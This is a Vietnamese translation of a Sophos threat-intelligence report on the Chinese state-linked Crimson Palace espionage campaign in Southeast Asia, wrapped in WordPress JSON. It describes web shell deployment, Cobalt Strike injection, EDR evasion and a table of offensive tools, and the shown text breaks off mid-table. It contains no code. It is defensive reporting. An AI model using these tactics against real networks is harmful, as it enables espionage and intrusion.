{"id":20428,"date":"2024-09-18T16:25:02","date_gmt":"2024-09-18T09:25:02","guid":{"rendered":"https:\/\/thegioifirewall.com\/?p=20409"},"modified":"2025-03-24T07:27:22","modified_gmt":"2025-03-24T07:27:22","slug":"crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi","status":"publish","type":"post","link":"https:\/\/vacif.com\/en\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi\/","title":{"rendered":"CRIMSON PALACE TR\u1ede L\u1ea0I: C\u00d4NG C\u1ee4, CHI\u1ebeN THU\u1eacT V\u00c0 M\u1ee4C TI\u00caU M\u1edaI"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-1024x683.png\" alt=\"\" class=\"wp-image-20417\"\/><\/figure>\n\n\n\n<p>Chi\u1ebfn d\u1ecbch gi\u00e1n \u0111i\u1ec7p m\u1ea1ng c\u1ee7a Trung Qu\u1ed1c ti\u1ebfp t\u1ee5c n\u1ed7 l\u1ef1c trong nhi\u1ec1u t\u1ed5 ch\u1ee9c \u1edf \u0110\u00f4ng Nam \u00c1, k\u1ebft h\u1ee3p c\u00e1c chi\u1ebfn thu\u1eadt v\u00e0 m\u1edf r\u1ed9ng n\u1ed7 l\u1ef1c&nbsp;<\/p>\n\n\n\n<p>\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/author\/mark-parsons\/\">Mark Parsons<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/author\/morgan-demboski\/\">Morgan Demboski<\/a>&nbsp;,&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/author\/sean-gallagher\/\">Sean Gallagher<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/10\/crimson-palace-new-tools-tactics-targets\/\">Ng\u00e0y 10 th\u00e1ng 9 n\u0103m 2024<\/a><\/p>\n\n\n\n<p>Sau m\u1ed9t th\u1eddi gian ng\u1eafn t\u1ea1m ng\u1eebng ho\u1ea1t \u0111\u1ed9ng, Sophos X-Ops ti\u1ebfp t\u1ee5c theo d\u00f5i v\u00e0 \u1ee9ng ph\u00f3 v\u1edbi nh\u1eefng g\u00ec ch\u00fang t\u00f4i \u0111\u00e1nh gi\u00e1 v\u1edbi \u0111\u1ed9 tin c\u1eady cao l\u00e0 m\u1ed9t ho\u1ea1t \u0111\u1ed9ng gi\u00e1n \u0111i\u1ec7p m\u1ea1ng do nh\u00e0 n\u01b0\u1edbc Trung Qu\u1ed1c ch\u1ec9 \u0111\u1ea1o nh\u1eafm v\u00e0o m\u1ed9t c\u01a1 quan quan tr\u1ecdng trong ch\u00ednh ph\u1ee7 c\u1ee7a m\u1ed9t qu\u1ed1c gia \u0110\u00f4ng Nam \u00c1.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Trong qu\u00e1 tr\u00ecnh \u0111i\u1ec1u tra ho\u1ea1t \u0111\u1ed9ng \u0111\u00f3, m\u00e0 ch\u00fang t\u00f4i theo d\u00f5i l\u00e0 Chi\u1ebfn d\u1ecbch Crimson Palace, Sophos Managed Detection and Response (MDR) \u0111\u00e3 t\u00ecm th\u1ea5y d\u1eef li\u1ec7u \u0111o t\u1eeb xa cho th\u1ea5y s\u1ef1 x\u00e2m ph\u1ea1m c\u1ee7a&nbsp;c\u00e1c t\u1ed5 ch\u1ee9c ch\u00ednh ph\u1ee7 kh\u00e1c trong khu v\u1ef1c v\u00e0 \u0111\u00e3 ph\u00e1t hi\u1ec7n ra ho\u1ea1t \u0111\u1ed9ng li\u00ean quan t\u1eeb c\u00e1c c\u1ee5m \u0111e d\u1ecda hi\u1ec7n c\u00f3 n\u00e0y trong c\u00e1c t\u1ed5 ch\u1ee9c kh\u00e1c trong c\u00f9ng khu v\u1ef1c. Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng li\u00ean t\u1ee5c s\u1eed d\u1ee5ng c\u00e1c m\u1ea1ng l\u01b0\u1edbi d\u1ecbch v\u1ee5 c\u00f4ng v\u00e0 t\u1ed5 ch\u1ee9c b\u1ecb x\u00e2m ph\u1ea1m kh\u00e1c trong khu v\u1ef1c \u0111\u00f3 \u0111\u1ec3 ph\u00e2n ph\u1ed1i ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 d\u01b0\u1edbi v\u1ecf b\u1ecdc l\u00e0 \u0111i\u1ec3m truy c\u1eadp \u0111\u00e1ng tin c\u1eady.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia\/\">B\u00e1o c\u00e1o tr\u01b0\u1edbc \u0111\u00e2y c\u1ee7a ch\u00fang t\u00f4i<\/a>&nbsp;\u0111\u1ec1 c\u1eadp \u0111\u1ebfn ho\u1ea1t \u0111\u1ed9ng t\u1eeb ba c\u1ee5m ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda an ninh li\u00ean quan (STAC) c\u00f3 li\u00ean quan \u0111\u1ebfn ho\u1ea1t \u0111\u1ed9ng gi\u00e1n \u0111i\u1ec7p m\u1ea1ng: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870) v\u00e0 Cluster Charlie (STAC1305), t\u1ea5t c\u1ea3 \u0111\u1ec1u \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n trong kho\u1ea3ng th\u1eddi gian t\u1eeb th\u00e1ng 3 \u0111\u1ebfn th\u00e1ng 8 n\u0103m 2023. C\u1ea3 ba c\u1ee5m \u0111e d\u1ecda ho\u1ea1t \u0111\u1ed9ng b\u00ean trong c\u01a1 quan m\u1ee5c ti\u00eau \u0111\u1ec1u ng\u1eebng ho\u1ea1t \u0111\u1ed9ng v\u00e0o th\u00e1ng 8 n\u0103m 2023.&nbsp;<\/p>\n\n\n\n<p>Tuy nhi\u00ean, Cluster Charlie \u0111\u00e3 ti\u1ebfp t\u1ee5c ho\u1ea1t \u0111\u1ed9ng sau \u0111\u00f3 v\u00e0i tu\u1ea7n. Ho\u1ea1t \u0111\u1ed9ng n\u00e0y, bao g\u1ed3m m\u1ed9t keylogger ch\u01b0a \u0111\u01b0\u1ee3c ghi ch\u00e9p tr\u01b0\u1edbc \u0111\u00f3 m\u00e0 ch\u00fang t\u00f4i \u0111\u1eb7t t\u00ean l\u00e0 \u201cTattleTale\u201d, \u0111\u00e1nh d\u1ea5u s\u1ef1 kh\u1edfi \u0111\u1ea7u c\u1ee7a giai \u0111o\u1ea1n th\u1ee9 hai v\u00e0 m\u1edf r\u1ed9ng ho\u1ea1t \u0111\u1ed9ng x\u00e2m nh\u1eadp tr\u00ean to\u00e0n khu v\u1ef1c, v\u1eabn \u0111ang ti\u1ebfp di\u1ec5n.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Sophos MDR c\u0169ng quan s\u00e1t th\u1ea5y m\u1ed9t lo\u1ea1t c\u00e1c ph\u00e1t hi\u1ec7n ph\u00f9 h\u1ee3p v\u1edbi c\u00f4ng c\u1ee5 \u0111\u01b0\u1ee3c Cluster Bravo s\u1eed d\u1ee5ng t\u1ea1i c\u00e1c th\u1ef1c th\u1ec3 b\u00ean ngo\u00e0i c\u01a1 quan ch\u00ednh ph\u1ee7 \u0111\u01b0\u1ee3c \u0111\u1ec1 c\u1eadp trong b\u00e1o c\u00e1o ban \u0111\u1ea7u c\u1ee7a ch\u00fang t\u00f4i, bao g\u1ed3m hai t\u1ed5 ch\u1ee9c d\u1ecbch v\u1ee5 c\u00f4ng phi ch\u00ednh ph\u1ee7 v\u00e0 nhi\u1ec1u t\u1ed5 ch\u1ee9c kh\u00e1c, t\u1ea5t c\u1ea3 \u0111\u1ec1u c\u00f3 tr\u1ee5 s\u1edf t\u1ea1i c\u00f9ng m\u1ed9t khu v\u1ef1c. C\u00e1c ph\u00e1t hi\u1ec7n \u0111\u00f3 bao g\u1ed3m ph\u00e9p \u0111o t\u1eeb xa cho th\u1ea5y vi\u1ec7c s\u1eed d\u1ee5ng h\u1ec7 th\u1ed1ng c\u1ee7a m\u1ed9t t\u1ed5 ch\u1ee9c l\u00e0m \u0111i\u1ec3m chuy\u1ec3n ti\u1ebfp C2 v\u00e0 l\u00e0 n\u01a1i t\u1eadp trung c\u00e1c c\u00f4ng c\u1ee5, c\u0169ng nh\u01b0 vi\u1ec7c t\u1eadp trung ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i tr\u00ean m\u00e1y ch\u1ee7 Microsoft Exchange b\u1ecb x\u00e2m ph\u1ea1m c\u1ee7a m\u1ed9t t\u1ed5 ch\u1ee9c kh\u00e1c.&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-1.png\" alt=\"\" class=\"wp-image-20412\"\/><figcaption class=\"wp-element-caption\"><em>H\u00ecnh 1. Ba nh\u00f3m ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda an ninh \u0111\u01b0\u1ee3c quan s\u00e1t th\u1ea5y trong giai \u0111o\u1ea1n \u0111\u1ea7u c\u1ee7a Chi\u1ebfn d\u1ecbch Crimson Palace v\u00e0 s\u1ef1 ch\u1ed3ng ch\u00e9o c\u1ee7a ch\u00fang v\u1edbi c\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 \u0111\u01b0\u1ee3c b\u00e1o c\u00e1o tr\u01b0\u1edbc \u0111\u00f3 v\u00e0 v\u1edbi nhau, t\u1eeb th\u00e1ng 3 \u0111\u1ebfn th\u00e1ng 8 n\u0103m 2023<\/em><\/figcaption><\/figure>\n\n\n\n<p><strong>Cluster Bravo, m\u1edf r\u1ed9ng&nbsp;<\/strong><\/p>\n\n\n\n<p>Trong khi Cluster Bravo ch\u1ec9 ho\u1ea1t \u0111\u1ed9ng trong th\u1eddi gian ng\u1eafn tr\u00ean m\u1ea1ng c\u1ee7a t\u1ed5 ch\u1ee9c \u0111\u01b0\u1ee3c \u0111\u1ec1 c\u1eadp trong b\u00e1o c\u00e1o \u0111\u1ea7u ti\u00ean c\u1ee7a ch\u00fang t\u00f4i, Sophos X-Ops sau \u0111\u00f3 \u0111\u00e3 ph\u00e1t hi\u1ec7n ho\u1ea1t \u0111\u1ed9ng li\u00ean quan \u0111\u1ebfn Cluster Bravo tr\u00ean m\u1ea1ng c\u1ee7a \u00edt nh\u1ea5t 11 t\u1ed5 ch\u1ee9c v\u00e0 c\u01a1 quan kh\u00e1c trong c\u00f9ng khu v\u1ef1c. Ngo\u00e0i ra, Sophos \u0111\u00e3 x\u00e1c \u0111\u1ecbnh \u0111\u01b0\u1ee3c nhi\u1ec1u t\u1ed5 ch\u1ee9c c\u00f3 c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 d\u00e0n d\u1ef1ng ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i bao g\u1ed3m m\u1ed9t c\u01a1 quan ch\u00ednh ph\u1ee7. C\u00e1c t\u00e1c nh\u00e2n \u0111e d\u1ecda \u0111\u00e3 ch\u00ednh x\u00e1c trong c\u00e1ch ch\u00fang t\u1eadn d\u1ee5ng c\u00e1c m\u00f4i tr\u01b0\u1eddng b\u1ecb x\u00e2m ph\u1ea1m n\u00e0y \u0111\u1ec3 l\u01b0u tr\u1eef, \u0111\u1ea3m b\u1ea3o lu\u00f4n s\u1eed d\u1ee5ng m\u1ed9t t\u1ed5 ch\u1ee9c b\u1ecb nhi\u1ec5m trong c\u00f9ng m\u1ed9t ng\u00e0nh d\u1ecdc cho c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng c\u1ee7a ch\u00fang.&nbsp;<\/p>\n\n\n\n<p>Ho\u1ea1t \u0111\u1ed9ng m\u1edbi n\u00e0y k\u00e9o d\u00e0i t\u1eeb th\u00e1ng 1 \u0111\u1ebfn th\u00e1ng 6 n\u0103m 2024 v\u00e0 bao g\u1ed3m hai t\u1ed5 ch\u1ee9c t\u01b0 nh\u00e2n c\u00f3 vai tr\u00f2 li\u00ean quan \u0111\u1ebfn ch\u00ednh ph\u1ee7. C\u00e1c t\u1ed5 ch\u1ee9c b\u1ecb \u1ea3nh h\u01b0\u1edfng \u0111\u1ea1i di\u1ec7n cho m\u1ed9t lo\u1ea1t c\u00e1c ch\u1ee9c n\u0103ng quan tr\u1ecdng c\u1ee7a ch\u00ednh ph\u1ee7 m\u1ee5c ti\u00eau.&nbsp;<\/p>\n\n\n\n<p><strong>Cluster Charlie, \u0111\u1ed5i m\u1edbi&nbsp;<\/strong><\/p>\n\n\n\n<p>Cluster Charlie \u0111\u00e3 im l\u1eb7ng v\u00e0o th\u00e1ng 8 n\u0103m 2023 sau khi Sophos ch\u1eb7n&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-c2\">c\u00e1c c\u1ea5y gh\u00e9p C2 t\u00f9y ch\u1ec9nh (PocoProxy)<\/a>&nbsp;. Tuy nhi\u00ean, nh\u1eefng k\u1ebb \u0111\u1ee9ng sau v\u1ee5 x\u00e2m nh\u1eadp cu\u1ed1i c\u00f9ng \u0111\u00e3 quay tr\u1edf l\u1ea1i v\u1edbi c\u00e1c k\u1ef9 thu\u1eadt m\u1edbi v\u00e0o cu\u1ed1i th\u00e1ng 9.&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u0110i\u1ec1u n\u00e0y b\u1eaft \u0111\u1ea7u b\u1eb1ng nh\u1eefng n\u1ed7 l\u1ef1c tr\u1ed1n tr\u00e1nh c\u00e1c kh\u1ed1i b\u1eb1ng c\u00e1ch chuy\u1ec3n sang c\u00e1c k\u00eanh C2 kh\u00e1c nhau v\u00e0 v\u1edbi vi\u1ec7c di\u1ec5n vi\u00ean Cluster Charlie thay \u0111\u1ed5i c\u00e1ch tri\u1ec3n khai c\u00e1c b\u1ea3n c\u1ea5y gh\u00e9p. Nh\u1eefng thay \u0111\u1ed5i n\u00e0y bao g\u1ed3m, nh\u01b0 ch\u00fang t\u00f4i \u0111\u00e3 l\u01b0u \u00fd trong b\u00e1o c\u00e1o tr\u01b0\u1edbc, s\u1eed d\u1ee5ng tr\u00ecnh t\u1ea3i ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i t\u00f9y ch\u1ec9nh c\u00f3 t\u00ean l\u00e0&nbsp;<a href=\"https:\/\/www.sentinelone.com\/labs\/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector\/\">HUI loader<\/a>&nbsp;(do Sentinel Labs x\u00e1c \u0111\u1ecbnh) \u0111\u1ec3 \u0111\u01b0a m\u1ed9t \u0111\u00e8n hi\u1ec7u Cobalt Strike v\u00e0o ti\u1ec7n \u00edch M\u00e1y t\u00ednh t\u1eeb xa mstsc.exe.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Tuy nhi\u00ean, v\u00e0o th\u00e1ng 9, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u1ee9ng sau Cluster Charlie \u0111\u00e3 thay \u0111\u1ed5i ho\u1ea1t \u0111\u1ed9ng c\u1ee7a ch\u00fang theo nhi\u1ec1u c\u00e1ch:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>H\u1ecd s\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 m\u00e3 ngu\u1ed3n m\u1edf v\u00e0 c\u00f3 s\u1eb5n \u0111\u1ec3 thi\u1ebft l\u1eadp l\u1ea1i s\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a m\u00ecnh sau khi Sophos ph\u00e1t hi\u1ec7n v\u00e0 ch\u1eb7n c\u00e1c c\u00f4ng c\u1ee5 t\u00f9y ch\u1ec9nh c\u1ee7a h\u1ecd.&nbsp;<\/li>\n\n\n\n<li>H\u1ecd \u0111\u00e3 t\u1eadn d\u1ee5ng nhi\u1ec1u c\u00f4ng c\u1ee5 v\u00e0 k\u1ef9 thu\u1eadt v\u1ed1n l\u00e0 m\u1ed9t ph\u1ea7n c\u1ee7a c\u00e1c nh\u00f3m ho\u1ea1t \u0111\u1ed9ng \u0111e d\u1ecda kh\u00e1c m\u00e0 ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t.&nbsp;&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-2-1024x539.png\" alt=\"\" class=\"wp-image-20413\"\/><figcaption class=\"wp-element-caption\"><em>H\u00ecnh 2: Ho\u1ea1t \u0111\u1ed9ng li\u00ean quan \u0111\u1ebfn c\u1ee5m Charlie \u0111\u01b0\u1ee3c ti\u1ebfp t\u1ee5c v\u00e0o th\u00e1ng 9 n\u0103m 2023 sau khi b\u1ecb gi\u00e1n \u0111o\u1ea1n v\u00e0o th\u00e1ng 8<\/em><\/figcaption><\/figure>\n\n\n\n<p>Vi\u1ec7c r\u00f2 r\u1ec9 d\u1eef li\u1ec7u c\u00f3 gi\u00e1 tr\u1ecb t\u00ecnh b\u00e1o v\u1eabn l\u00e0 m\u1ee5c ti\u00eau sau khi ho\u1ea1t \u0111\u1ed9ng tr\u1edf l\u1ea1i. Tuy nhi\u00ean, ph\u1ea7n l\u1edbn n\u1ed7 l\u1ef1c c\u1ee7a h\u1ecd d\u01b0\u1eddng nh\u01b0 t\u1eadp trung v\u00e0o vi\u1ec7c thi\u1ebft l\u1eadp l\u1ea1i v\u00e0 m\u1edf r\u1ed9ng ch\u1ed7 \u0111\u1ee9ng c\u1ee7a h\u1ecd tr\u00ean m\u1ea1ng m\u1ee5c ti\u00eau b\u1eb1ng c\u00e1ch b\u1ecf qua ph\u1ea7n m\u1ec1m EDR v\u00e0 \u200b\u200bnhanh ch\u00f3ng thi\u1ebft l\u1eadp l\u1ea1i quy\u1ec1n truy c\u1eadp khi c\u00e1c thi\u1ebft b\u1ecb c\u1ea5y gh\u00e9p C2 c\u1ee7a h\u1ecd \u0111\u00e3 b\u1ecb ch\u1eb7n.&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>T\u1eeb th\u00e1ng 9 n\u0103m 2023 tr\u1edf \u0111i: Web shell v\u00e0 c\u00e1c c\u00f4ng c\u1ee5 ngu\u1ed3n m\u1edf&nbsp;<\/strong><\/p>\n\n\n\n<p>V\u1edbi c\u00e1c c\u00f4ng c\u1ee5 C2 c\u1ee7a h\u1ecd b\u1ecb Sophos ch\u1eb7n, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 \u00e1p d\u1ee5ng m\u1ed9t c\u00e1ch ti\u1ebfp c\u1eadn m\u1edbi. S\u1eed d\u1ee5ng th\u00f4ng tin x\u00e1c th\u1ef1c \u0111\u00e3 \u0111\u00e1nh c\u1eafp tr\u01b0\u1edbc \u0111\u00f3, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 tri\u1ec3n khai m\u1ed9t web shell t\u1edbi m\u1ed9t m\u00e1y ch\u1ee7 \u1ee9ng d\u1ee5ng web b\u1eb1ng t\u00ednh n\u0103ng t\u1ea3i t\u1ec7p t\u00edch h\u1ee3p c\u1ee7a n\u00f3. K\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 th\u1ef1c hi\u1ec7n m\u1ed9t cu\u1ed9c \u0111i\u1ec1u tra c\u00f3 ph\u01b0\u01a1ng ph\u00e1p v\u1ec1 t\u1ec7p c\u1ea5u h\u00ecnh c\u1ee7a m\u00e1y ch\u1ee7 \u1ee9ng d\u1ee5ng web v\u00e0 c\u00e1c th\u01b0 m\u1ee5c \u1ea3o \u0111\u1ec3 x\u00e1c \u0111\u1ecbnh v\u1ecb tr\u00ed DLL c\u1ee7a \u1ee9ng d\u1ee5ng web. Sau \u0111\u00f3, ch\u00fang s\u1eed d\u1ee5ng web shell \u0111\u1ec3 th\u1ef1c thi c\u00e1c l\u1ec7nh tr\u00ean m\u00e1y ch\u1ee7 \u1ee9ng d\u1ee5ng web m\u1ee5c ti\u00eau. \u0110i\u1ec1u n\u00e0y bao g\u1ed3m sao ch\u00e9p th\u01b0 vi\u1ec7n li\u00ean k\u1ebft \u0111\u1ed9ng (DLL) c\u1ee7a \u1ee9ng d\u1ee5ng v\u00e0o m\u1ed9t th\u01b0 m\u1ee5c t\u00e0i li\u1ec7u web v\u00e0 ng\u1ee5y trang n\u00f3 th\u00e0nh PDF \u0111\u1ec3 cho ph\u00e9p n\u00f3 \u0111\u01b0\u1ee3c truy xu\u1ea5t th\u00f4ng qua \u1ee9ng d\u1ee5ng, s\u1eed d\u1ee5ng th\u00f4ng tin x\u00e1c th\u1ef1c tr\u01b0\u1edbc \u0111\u00f3 \u0111\u01b0\u1ee3c li\u00ean k\u1ebft v\u1edbi ho\u1ea1t \u0111\u1ed9ng c\u1ee7a Cluster Charlie.&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>M\u1ecdi ho\u1ea1t \u0111\u1ed9ng trinh s\u00e1t v\u00e0 thu th\u1eadp n\u00e0y di\u1ec5n ra trong m\u1ed9t kho\u1ea3ng th\u1eddi gian c\u1ef1c k\u1ef3 ng\u1eafn\u2014d\u01b0\u1edbi 45 ph\u00fat.&nbsp;<\/p>\n\n\n\n<p>H\u1ecd \u0111\u00e3 quay l\u1ea1i m\u00e1y ch\u1ee7 \u1ee9ng d\u1ee5ng web b\u1ecb x\u00e2m ph\u1ea1m v\u00e0o th\u00e1ng 11, s\u1eed d\u1ee5ng web shell \u0111\u1ec3 tri\u1ec3n khai khung Havoc C2 ngu\u1ed3n m\u1edf nh\u1eb1m h\u1ed7 tr\u1ee3 ho\u1ea1t \u0111\u1ed9ng do th\u00e1m. M\u00e1y ch\u1ee7 n\u00e0y \u0111\u00e3 ngo\u1ea1i tuy\u1ebfn ngay sau \u0111\u00f3 v\u00e0 ch\u00fang t\u00f4i kh\u00f4ng th\u1ec3 thu th\u1eadp th\u00eam d\u1eef li\u1ec7u t\u1eeb xa v\u1ec1 ho\u1ea1t \u0111\u1ed9ng c\u1ee7a nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng. Tuy nhi\u00ean, Sophos MDR sau \u0111\u00f3 \u0111\u00e3 t\u00ecm th\u1ea5y c\u00f9ng m\u1ed9t \u1ee9ng d\u1ee5ng web b\u1ecb khai th\u00e1c tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 kh\u00e1c. Trong v\u00e0i th\u00e1ng ti\u1ebfp theo, t\u00e1c nh\u00e2n \u0111e d\u1ecda Cluster Charlie s\u1ebd th\u01b0\u1eddng xuy\u00ean tri\u1ec3n khai web shell tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 kh\u00e1c tr\u00ean to\u00e0n b\u1ed9 m\u1ea1ng m\u1ee5c ti\u00eau tr\u01b0\u1edbc khi t\u1ea3i xu\u1ed1ng c\u00e1c t\u1ea3i tr\u1ecdng Havoc.\u202f&nbsp;<\/p>\n\n\n\n<p>V\u00ed d\u1ee5, v\u00e0o th\u00e1ng 11, nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng \u0111\u00e3 s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 Havoc \u0111\u1ec3 \u0111\u01b0a m\u00e3 v\u00e0o c\u00e1c quy tr\u00ecnh kh\u00e1c, sau \u0111\u00f3 tri\u1ec3n khai c\u00f4ng c\u1ee5 SharpHound ngu\u1ed3n m\u1edf \u0111\u1ec3 l\u1eadp b\u1ea3n \u0111\u1ed3 c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng Active Directory.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Ho\u1ea1t \u0111\u1ed9ng n\u00e0y cho th\u1ea5y s\u1ef1 quan t\u00e2m li\u00ean t\u1ee5c c\u1ee7a c\u00e1c t\u00e1c nh\u00e2n \u0111\u1eb1ng sau Cluster Charlie trong vi\u1ec7c l\u1eadp b\u1ea3n \u0111\u1ed3 \u0111\u1ecba h\u00ecnh c\u01a1 s\u1edf h\u1ea1 t\u1ea7ng c\u1ee7a m\u00f4i tr\u01b0\u1eddng t\u1eeb nhi\u1ec1u g\u00f3c nh\u00ecn. V\u00e0o th\u00e1ng 6 n\u0103m 2023,&nbsp;<a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-charlie\">Cluster Charlie \u0111\u00e3 th\u1ef1c hi\u1ec7n m\u1ed9t l\u1ea7n ch\u1ee5p chuy\u00ean s\u00e2u<\/a>&nbsp;c\u00e1c s\u1ef1 ki\u1ec7n \u0111\u0103ng nh\u1eadp th\u00e0nh c\u00f4ng c\u1ee7a t\u1ed5 ch\u1ee9c m\u1ee5c ti\u00eau (ID s\u1ef1 ki\u1ec7n 4624) th\u00f4ng qua c\u00e1c l\u1ec7nh PowerShell. H\u1ecd ti\u1ebfp t\u1ee5c th\u1ef1c hi\u1ec7n qu\u00e9t ping c\u00e1c \u0111\u1ecba ch\u1ec9 IP \u0111\u01b0\u1ee3c li\u00ean k\u1ebft v\u1edbi v\u1ecb tr\u00ed c\u1ee7a c\u00e1c l\u1ea7n \u0111\u0103ng nh\u1eadp th\u00e0nh c\u00f4ng \u0111\u00f3, l\u1eadp b\u1ea3n \u0111\u1ed3 ng\u01b0\u1eddi d\u00f9ng c\u1ee7a t\u1ed5 ch\u1ee9c v\u1edbi kh\u00f4ng gian \u0111\u1ecba ch\u1ec9 IP c\u1ee7a m\u1ea1ng. Vi\u1ec7c s\u1eed d\u1ee5ng SharpHound s\u1ebd cung c\u1ea5p th\u00eam ki\u1ebfn \u200b\u200bth\u1ee9c v\u1ec1 c\u1ea5u tr\u00fac c\u1ee7a t\u1ed5 ch\u1ee9c, bao g\u1ed3m th\u00f4ng tin chi ti\u1ebft v\u1ec1 c\u00e1c quy\u1ec1n trong mi\u1ec1n \u0111\u01b0\u1ee3c ch\u1ec9 \u0111\u1ecbnh cho nh\u1eefng ng\u01b0\u1eddi d\u00f9ng \u0111\u01b0\u1ee3c l\u1eadp b\u1ea3n \u0111\u1ed3 n\u00e0y.&nbsp;<\/p>\n\n\n\n<p>Ch\u00fang t\u00f4i ti\u1ebfp t\u1ee5c th\u1ea5y nh\u1eefng k\u1ebb \u0111e d\u1ecda chuy\u1ec3n sang c\u00e1c c\u00f4ng c\u1ee5 ngu\u1ed3n m\u1edf khi c\u00f4ng c\u1ee5 c\u1ee7a ch\u00fang \u0111\u1ec3 tr\u1ed1n tr\u00e1nh C2 ho\u1eb7c MDR \u0111\u00e3 th\u1ea5t b\u1ea1i trong giai \u0111o\u1ea1n ho\u1ea1t \u0111\u1ed9ng th\u1ee9 hai n\u00e0y. C\u00e1c c\u00f4ng c\u1ee5 c\u00f3 s\u1eb5n v\u00e0 ngu\u1ed3n m\u1edf bao g\u1ed3m:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td>Tool&nbsp;&nbsp;<\/td><td>Application&nbsp;<\/td><td>Timeframe&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/www.cobaltstrike.com\/\">Cobalt Strike<\/a>&nbsp;&nbsp;&nbsp;<\/td><td>C2&nbsp;<\/td><td>Aug.-Sep. 2023&nbsp;Dec. 2023&nbsp;&nbsp;Feb.-Mar. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/HavocFramework\/Havoc\">Havoc<\/a>&nbsp;&nbsp;<\/td><td>C2&nbsp;<\/td><td>Sep. 2023 \u2013 Jun. 2024&nbsp;<\/td><\/tr><tr><td>Atexec&nbsp;<\/td><td>C2\/ Lateral Movement&nbsp;<\/td><td>Oct.-Nov. 2023&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/BloodHoundAD\/SharpHound\">SharpHound<\/a>&nbsp;<\/td><td>Reconnaissance&nbsp;<\/td><td>Nov. 2023&nbsp;<\/td><\/tr><tr><td>Impacket&nbsp;&nbsp;<\/td><td>Lateral movement&nbsp;<\/td><td>Apr. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a>&nbsp;&nbsp;<\/td><td>Shellcode loader&nbsp;<\/td><td>Feb.-Mar. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/INotGreen\/XieBroC2\">Xiebro<\/a>C2&nbsp;<\/td><td>C2&nbsp;<\/td><td>Feb. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/weak1337\/Alcatraz\">Alcatraz<\/a>&nbsp;<\/td><td>EDR Evasion&nbsp;<\/td><td>Feb.-Jun. 2024&nbsp;<\/td><\/tr><tr><td><a href=\"https:\/\/github.com\/cloudflare\/cloudflared\">Cloudflared tunnel<\/a>&nbsp;<\/td><td>C2&nbsp;&nbsp;<\/td><td>Jun. 2024&nbsp;<\/td><\/tr><tr><td><a 